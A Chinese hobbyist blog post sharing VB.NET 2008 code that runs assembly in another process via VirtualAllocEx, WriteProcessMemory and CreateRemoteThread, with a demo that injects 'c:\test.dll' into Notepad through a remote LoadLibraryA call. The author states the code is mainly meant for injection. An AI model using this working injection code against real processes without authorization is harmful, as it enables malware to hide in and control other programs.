VB.NET 2008 寫的代碼,主要是前幾天看人家寫的VB6什麼的代碼,運行起來 不錯,可改成VB.NET 2008一寫,直接壞事了,在XP系統D325的U上跑的都挺好, 可放到VISTA系統TK55的本子上,VB6的還行,.NET的直接非法。針對這個,完整 重寫了一下代碼。
簡單介紹步驟:
1、通過ID獲取進程句柄,並替它申請一塊內存:
'獲取對方進程
RemoteProcess = Process.GetProcessById (PID)
'為對方進程申請4KB內存
AllocBaseAddress = VirtualAllocEx (RemoteProcess.Handle, 0, MEM_SIZE, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
2、構建匯編代碼,這裡分兩種情況
A、添加代碼
'添加整型
Protected Sub AddInt2Code(ByVal Value As Integer)
Dim bytes() As Byte = BitConverter.GetBytes(CInt (Value)) '獲取字節內容
Add2Memory(bytes, PtrAddressOffset) '寫入參數堆棧
PtrAddressOffset += 4 '堆棧位置指針向後移動
End Sub
'添加字節型
Protected Sub AddByte2Code(ByVal Value As Byte)
Dim bytes(0) As Byte
bytes(0) = Value
Add2Memory(bytes, PtrAddressOffset)
PtrAddressOffset += 1
End Sub
'添加字節數組
Protected Sub AddBytes2Code(ByVal Value As Byte())
Add2Memory(Value, PtrAddressOffset)
PtrAddressOffset += Value.Length
End Sub
B、添加數據
Add2Memory(Value, ObjAddressOffset) ' 將數據寫入“數據區”
Dim odata As New mData '記錄每個數據(地址和長度)
odata.prt = ObjAddressOffset + AllocBaseAddress
odata.len = Value.Length
DataArraylist.Add(odata)
ObjAddressOffset += Value.Length '堆棧數據指針向後移動
ObjAddressOffset += ObjAddressOffset Mod 4 '四字節對齊
3、運行
'運行
Function Run() As Integer
Dim lngRet As Integer
Dim ThreadHwnd = CreateRemoteThread (RemoteProcess.Handle, 0, 0, AllocBaseAddress, 0, 0, 0)
WaitForSingleObject(ThreadHwnd, INFINITE)
GetExitCodeThread(ThreadHwnd, lngRet)
Return lngRet
End Function
4、回收內存
Protected Overrides Sub Finalize()
On Error Resume Next
VirtualFreeEx(RemoteProcess.Handle, AllocBaseAddress, MEM_AUTOFREE, MEM_RELEASE) '釋放為對方申請的內存
MyBase.Finalize()
End Sub
完畢~!~
完整代碼如下:
Imports System.Runtime.InteropServices
''' <summary>
''' 用於遠線程運行ASM代碼
''' 遠線程被限制在4KB空間內:
''' 前512字節被用於代碼,後面的用於數據
''' </summary>
''' <remarks></remarks>
Public Class RunRemoteASMCode
'自定義常數
Private Const MEM_SIZE As Integer = &H1000 '申 請內存大小
Private Const MEM_AUTOFREE As Integer = &H0 '釋放 內存時系統自動判別大小
Private Const INFINITE As Integer = -1 '等 待時間
'默認常數
Private Const MEM_COMMIT As Integer = &H1000
Private Const MEM_RESERVE As Integer = &H2000
Private Const MEM_RELEASE As Integer = &H8000
Private Const PAGE_EXECUTE_READWRITE As Integer = &H40
Protected AllocBaseAddress As Integer '申 請內存的基地址
Protected ThreadHwnd As Integer '遠線程句柄
Protected RemoteProcess As Process '對方進程
Protected PtrAddressOffset As Integer '代 碼基地址
Protected ObjAddressOffset As Integer '數 據基地址
Protected DataArraylist As New ArrayList
Sub New(ByVal PID As Integer)
Try
'獲取對方進程
RemoteProcess = Process.GetProcessById(PID)
'為對方進程申請4KB內存
AllocBaseAddress = VirtualAllocEx (RemoteProcess.Handle, 0, MEM_SIZE, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
'初始化參數堆棧指針
ClearCodeAndData()
Catch ex As Exception
Throw New Exception("RunRemoteASMCode類初始化 錯誤", ex)
End Try
End Sub
'將數據添加到申請的內存
Protected Sub Add2Memory(ByVal Value() As Byte, ByVal AddressOffset As Integer)
WriteProcessMemory(RemoteProcess.Handle, AllocBaseAddress + AddressOffset, Value, Value.Length, 0)
End Sub
'添加數據
Protected Function AddData(ByVal Value() As Byte) As Integer
If ObjAddressOffset + Value.Length > MEM_SIZE Then
'MsgBox("數據超出所申請內存區域,無法繼續")
Return -1
Else
Dim ret As Integer = ObjAddressOffset
Add2Memory(Value, ObjAddressOffset) '將數據寫入“數據區”
Dim odata As New mData '記錄每個數據(地址和長度)
odata.prt = ObjAddressOffset + AllocBaseAddress
odata.len = Value.Length
DataArraylist.Add(odata)
ObjAddressOffset += Value.Length '堆棧數據指針向後移動
ObjAddressOffset += ObjAddressOffset Mod 4 '四字節對齊
Return ret
End If
End Function
'添加整型
Protected Sub AddInt2Code(ByVal Value As Integer)
Dim bytes() As Byte = BitConverter.GetBytes(CInt (Value)) '獲取字節內容
Add2Memory(bytes, PtrAddressOffset) '寫入參數堆棧
PtrAddressOffset += 4 '堆棧位置指針向後移動
End Sub
'添加字節型
Protected Sub AddByte2Code(ByVal Value As Byte)
Dim bytes(0) As Byte
bytes(0) = Value
Add2Memory(bytes, PtrAddressOffset)
PtrAddressOffset += 1
End Sub
'添加字節數組
Protected Sub AddBytes2Code(ByVal Value As Byte())
Add2Memory(Value, PtrAddressOffset)
PtrAddressOffset += Value.Length
End Sub
'運行
Function Run() As Integer
Dim lngRet As Integer
Dim ThreadHwnd = CreateRemoteThread (RemoteProcess.Handle, 0, 0, AllocBaseAddress, 0, 0, 0)
WaitForSingleObject(ThreadHwnd, INFINITE)
GetExitCodeThread(ThreadHwnd, lngRet)
Return lngRet
End Function
'清除代碼和數據(實際上沒有真正清除,只是重置了指針;數據段信 息記錄表確實清除了)
Public Sub ClearCodeAndData()
PtrAddressOffset = 0 '初始化參數堆棧為 所申請內存基地址
ObjAddressOffset = 512 '從基地址向後偏移512 字節供數據使用
DataArraylist.Clear()
End Sub
Protected Overrides Sub Finalize()
On Error Resume Next
VirtualFreeEx(RemoteProcess.Handle, AllocBaseAddress, MEM_AUTOFREE, MEM_RELEASE) '釋放為對方申請的內存
MyBase.Finalize()
End Sub
'用以記錄數據段信息
Protected Class mData
Public prt As Integer '地址
Public len As Integer '長度
End Class
End Class
這樣就可以運行了。。。。沒想出來啥例子來,匯編本來就學得不咋地…… 而且寫這個主要是為了注入……
哦也~先到這裡。把一個小測試的結果貼來~倒霉的還是記事本~~~
恩~~~窗體的是這樣搞的
Dim api As RunRemoteAPI
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Try
api = New RunRemoteAPI(CInt(TextBox1.Text))
'Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
TextBox3.Text = Hex(api.CallRemoteAPIByName ("kernel32", "LoadLibraryA", New mFuncParam (System.Text.ASCIIEncoding.ASCII.GetBytes("c:\test.dll"))))
TextBox2.Text = Hex(api.BaseAddress)
'枚舉對方進程模塊列表
For Each m As ProcessModule In Process.GetProcessById(api.RotateProcess.Id).Modules
ListBox1.Items.Add(m.FileName)
Next
'Private Declare Function FreeLibrary Lib "kernel32" Alias "FreeLibrary" (ByVal hLibModule As Long) As Long
api.CallRemoteAPIByName("kernel32", "FreeLibrary", New mFuncParam(CInt("&H" & TextBox3.Text)))
'枚舉對方進程模塊列表
For Each m As ProcessModule In Process.GetProcessById(api.RotateProcess.Id).Modules
ListBox2.Items.Add(m.FileName)
Next
'Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Dim s(255) As Byte
api.CallRemoteAPIByName("user32", "GetWindowTextW", New mFuncParam(CInt(Me.Handle)), _
New mFuncParam(s), _
New mFuncParam(s.Length))
Button1.Text = System.Text.Encoding.Unicode.GetString(api.RemoteBytesFromIndex(1))
Catch ex As Exception
MsgBox(ex.ToString)
End Try
End Sub
就是在上面的基礎上弄了一個這:
Public Class RunRemoteAPI : Inherits RunRemoteASMCode
基本還是可用的。。。還有一些不足,需要改進的,還沒弄好。。。
